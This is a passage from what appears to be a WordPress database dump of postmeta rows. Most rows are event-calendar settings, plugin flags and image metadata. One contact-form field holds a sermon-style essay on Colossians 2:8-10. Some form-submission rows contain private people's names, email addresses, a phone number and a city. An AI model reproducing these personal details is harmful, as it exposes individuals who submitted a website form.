mec_repeat_end_at_occurrences',''),(183769,268531,'mec_repeat_end_at_date',''),(183770,268531,'mec_advanced_days','a:0:{}'),(183771,268531,'mec_in_days',''),(183772,268531,'mec_not_in_days',''),(183773,268531,'mec_hourly_schedules','a:0:{}'),(183774,268531,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183775,268531,'mec_tickets','a:0:{}'),(183776,268531,'mec_fees_global_inheritance','1'),(143350,265121,'_seq_num','3'),(143353,265122,'_field_448','nmsoundram.mwcs@gmail.com'),(143354,265122,'_form_id','48'),(143355,265122,'_seq_num','5'),(143441,265131,'_field_133','PEGAH'),(144282,265225,'_field_138','Deceptive Philosophies\n\n\"See to it that no one takes you captive through hollow and deceptive philosophy, which depends on human tradition and the basic principles of this world rather than on Christ.\" (Colossians 2:8)\n\nFirst, according to Apostle Paul, these empty, deceptive philosophies \"depend on human tradition.\" They arise out of the thinking of men, find a foothold in society, and then are passed along from generation to generation so as to appear popular and widely supported. Hardly anyone dares question them because everybody believes them.\n\n\nSecond problem with false doctrine, is, in Paul\'s words, \"not according to Christ.\" Evil teaching always focuses on demoting Jesus, refusing to recognize the full revelation of his Being as it is set out in the Scriptures. Every cult attacks the Person or the work of Jesus---or both. They claim that he was nothing but a very good man, a model man, perhaps, although he lacked the insights into life and reality that are ours through modern knowledge. Thus, they put him down and demote him. Or, going to the opposite extreme, they regard Jesus as a supernatural being, one among several Divine Masters who come periodically into human affairs to teach us wonderful truths that we would never know otherwise, and which, if followed, will release within us great divine powers. (This is the teaching of the New Age movement that we are being exposed to today.) But these cults never view Jesus as God himself, willing to die in our place.\n\n\n\"For in Christ all the fullness of the Deity lives in bodily form, and you have this fullness in Christ, who is the head over every power and authority.\" (Colossians 2:9-10)\n\nEverywhere in Scripture you will find this approach: We are to be \"...looking unto Jesus, the author and finisher of our faith.\" We must focus again upon who he is, then the mind and heart are both protected against the assault of an evil teaching. Here the apostle reminds the Colossians that they already have everything they need if they have Jesus. They have God for \"in Christ dwells all the fullness of Deity in bodily form.\" All of God is present when Jesus is there. This does not mean that Jesus is both the Father and the Son. Scripture never teaches that. But \"the fullness of God,\" the whole Godhead, comes into your life when you receive Jesus. What more do you need? That is Paul\'s question. What more can these false teachers add to that? What new experience, what other additional divine person can you receive than what you have already received when you have Jesus? It may be that we need to discover more of what it means to have Christ in our heart; that is a lifelong process. We shall always be growing in appreciation of what it means to have him, but the point is (and it is a very important one): you do not need anything more than you already have. You merely need to understand more of what you have received. \n\nSome cults teach that Jesus has mere divine qualities in Colossians 2:9, Rather, it is saying that the absolute “fullness of Deity” dwells in Christ in bodily form.  Scholars are unanimous on this point.  For example:\n\n•	New Testament scholar Joseph B. Lightfoot says the phrase “fullness of deity” means “the totality of divine powers and attributes.” [J.B. Lightfoot, St. Paul’s Epistles to the Colossians and to Philemon (Grand Rapids: Zondervan Publishing House, 1979), p. 181.]\n•	Greek scholar J.H. Thayer says the Greek word in Colossians 2:9 refers to “deity, that is, the state of being God, Godhead.” [J.H. Thayer, A Greek-English Lexicon of the New Testament (Grand Rapids: Zondervan Publishing House, 1963), p. 288.]\n•	Greek scholar Richard C. Trench says that “St. Paul is declaring that in the Son there dwells all the fullness of absolute Godhead….He was, and is, absolute and perfect God.”  [R.C. Trench; cited in The New Treasury of Scripture Knowledge (Nashville: Thomas Nelson Publishers, 1992), p. 1401.]\n•	Greek scholar John A. Bengel states that the Greek word refers “not merely [to] the Divine attributes, but [to] the Divine nature itself.” [John A. Bengel; New Testament Word Studies, Vol. 2 (Grand Rapids: Kregel Publications, 1978), p. 460.]\n•	Bible scholar H.C.G. Moule states that the Greek word “is as strong as possible; Deity, not only Divinity.” [H.C.G. Moule, Studies in Colossians &amp; Philemon (Grand Rapids: Kregel Publications, 1977), p. 102.]\n•	Theologian Robert Reymond says the Greek word refers to “the being of the very essence of deity.”  [Robert Reymond, Jesus, Divine Messiah; The New Testament Witness (Phillipsburg, NJ: Presbyterian and Reformed, 1990), p. 250.]\n•	In keeping with all this, Theologian Benjamin B. Warfield concludes that “the very deity of God, that which makes God God, in all its completeness, has its permanent home in our Lord, and that in a ‘bodily fashion,’ that is, it is in Him clothed with a body.”  [Benjamin B. Warfield, The Person and Work of Christ (Philadelphia: Presbyterian and Reformed Publishing, 1950), p. 46.]\n\n\n\n'),(144281,265225,'_field_137','Deceptive Philosophies'),(144274,265224,'_field_403','Massey'),(143343,265121,'_field_168','Parker'),(143344,265121,'_field_169','hu_man01@msn.com'),(143345,265121,'_field_170','(970) 430-5061'),(143346,265121,'_field_171','Loveland'),(143347,265121,'_field_174','Spiritual Services Director'),(143348,265121,'_field_175','Who would one contact, to discuss providing remote Satsang (via phone), to someone who otherwise would not have access to Satsang, due to their disability?'),(143416,265124,'_form_id','13'),(159219,266534,'passster_activate_protection',NULL),(159218,266534,'passster_activate_global_protection',NULL),(159217,266534,'protect_children',''),(159216,266532,'bgseo_robots_follow','follow'),(159215,266532,'bgseo_robots_index','index'),(159214,266532,'boldgrid_in_page_containers','1'),(159213,266532,'boldgrid_hide_page_title','0'),(159212,266532,'passster_protection_type','password'),(159211,266532,'passster_activate_protection',NULL),(159229,266534,'_menu_item_xfn',''),(159228,266534,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(159227,266534,'_menu_item_target',''),(159226,266534,'_menu_item_object','page'),(159225,266534,'_menu_item_object_id','266532'),(159224,266534,'_menu_item_menu_item_parent','0'),(159223,266534,'_menu_item_type','post_type'),(159222,266534,'boldgrid_in_page_containers','1'),(159221,266534,'boldgrid_hide_page_title','0'),(142763,265063,'mec_certain_weekdays','a:0:{}'),(140306,264797,'_EventOrigin','events-calendar'),(133622,263941,'protect_children',''),(133623,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133624,263941,'_EventOrigin','events-calendar'),(133625,263941,'protect_children',''),(133626,263941,'protect_children',''),(133627,263941,'protect_children',''),(133628,263941,'protect_children',''),(133629,263941,'protect_children',''),(133630,263941,'protect_children',''),(133631,263941,'protect_children',''),(133632,263941,'protect_children',''),(133633,263941,'protect_children',''),(133634,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133666,263941,'_EventCurrencyPosition','prefix'),(133635,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133665,263941,'_EventCurrencySymbol',''),(133636,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133664,263941,'_EventDuration','3600'),(133667,263941,'_EventCost',''),(133637,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133663,263941,'_EventEndDateUTC','2021-03-21 17:30:00'),(133638,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133662,263941,'_EventStartDateUTC','2021-03-21 16:30:00'),(133668,263941,'_EventURL',''),(133639,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133661,263941,'_EventEndDate','2021-03-21 11:30:00'),(133669,263941,'_EventTimezone','America/Denver'),(133640,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133660,263941,'_EventStartDate','2021-03-21 10:30:00'),(133670,263941,'_EventTimezoneAbbr','MDT'),(133641,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133659,263941,'_EventShowMap',''),(133671,263941,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(133642,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133658,263941,'_EventShowMapLink',''),(133672,263941,'_RTECregistrationsDisabled','1'),(133673,263941,'_RTECdeadlineType','start'),(133643,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133657,263941,'boldgrid_hide_page_title','0'),(133674,263941,'_RTECwhoCanRegister','any'),(133644,263941,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614265178;s:12:\"_EventOrigin\";i:1614265178;s:13:\"_thumbnail_id\";i:1614266021;s:24:\"boldgrid_hide_page_title\";i:1614265178;s:17:\"_EventShowMapLink\";i:1614265178;s:13:\"_EventShowMap\";i:1614265178;s:15:\"_EventStartDate\";i:1614266021;s:13:\"_EventEndDate\";i:1614266021;s:18:\"_EventStartDateUTC\";i:1614266021;s:16:\"_EventEndDateUTC\";i:1614266021;s:14:\"_EventDuration\";i:1614265178;s:20:\"_EventCurrencySymbol\";i:1614265178;s:22:\"_EventCurrencyPosition\";i:1614265178;s:10:\"_EventCost\";i:1614265178;s:9:\"_EventURL\";i:1614265178;s:14:\"_EventTimezone\";i:1614265178;s:18:\"_EventTimezoneAbbr\";i:1614266021;s:27:\"_EventNextPendingRecurrence\";i:1614265178;s:26:\"_RTECregistrationsDisabled\";i:1614265178;s:17:\"_RTECdeadlineType\";i:1614265178;s:19:\"_RTECwhoCanRegister\";i:1614265178;s:23:\"_RTEClimitRegistrations\";i:1614265178;s:21:\"_RTECmaxRegistrations\";i:1614265178;s:16:\"_EventRecurrence\";i:1614265178;s:18:\"_RTECnumRegistered\";i:1614265178;s:13:\"_EventVenueID\";i:1614265178;s:12:\"_dp_original\";i:1614265178;s:10:\"_edit_last\";i:1614265249;s:10:\"post_title\";i:1614265249;s:12:\"post_content\";i:1615034149;s:16:\"tribe_events_cat\";i:1614294408;s:11:\"post_status\";i:1614266021;}'),(133646,263941,'_EventOrigin','events-calendar'),(133647,263941,'_EventOrigin','events-calendar'),(133648,263941,'_EventOrigin','events-calendar'),(133649,263941,'_EventOrigin','events-calendar'),(133650,263941,'_EventOrigin','events-calendar'),(133651,263941,'_EventOrigin','events-calendar'),(133652,263941,'_EventOrigin','events-calendar'),(133653,263941,'_EventOrigin','events-calendar'),(133654,263941,'_EventOrigin','events-calendar'),(133655,263941,'_EventOrigin','events-calendar'),(133656,263941,'_thumbnail_id','263943'),(133645,263941,'_EventOrigin','events-calendar'),(133675,263941,'_RTEClimitRegistrations','0'),(133676,263941,'_RTECmaxRegistrations','30'),(133677,263941,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(133678,263941,'_RTECnumRegistered','0'),(133679,263941,'_EventVenueID','262435'),(133681,263941,'_dp_original','263641'),(133682,263941,'_edit_lock','1615059721:2'),(133683,263941,'_edit_last','2'),(144940,265279,'smush-complete','1'),(144939,265279,'original-file','2021/08/ESC-OCT-2021-divine-creativity-1-updraft-pre-smush-original.jpg'),(133697,263943,'_wp_attached_file','2021/02/setting-sun-river.jpg'),(133698,263943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:471;s:6:\"height\";i:302;s:4:\"file\";s:29:\"2021/02/setting-sun-river.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"setting-sun-river-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"setting-sun-river-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"setting-sun-river-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(133725,263943,'original-file','2021/02/setting-sun-river-updraft-pre-smush-original.jpg'),(133726,263943,'smush-complete','1'),(133727,263943,'smush-info','The file was compressed from 38.66 KB to 37.23 KB saving 3.7 percent using 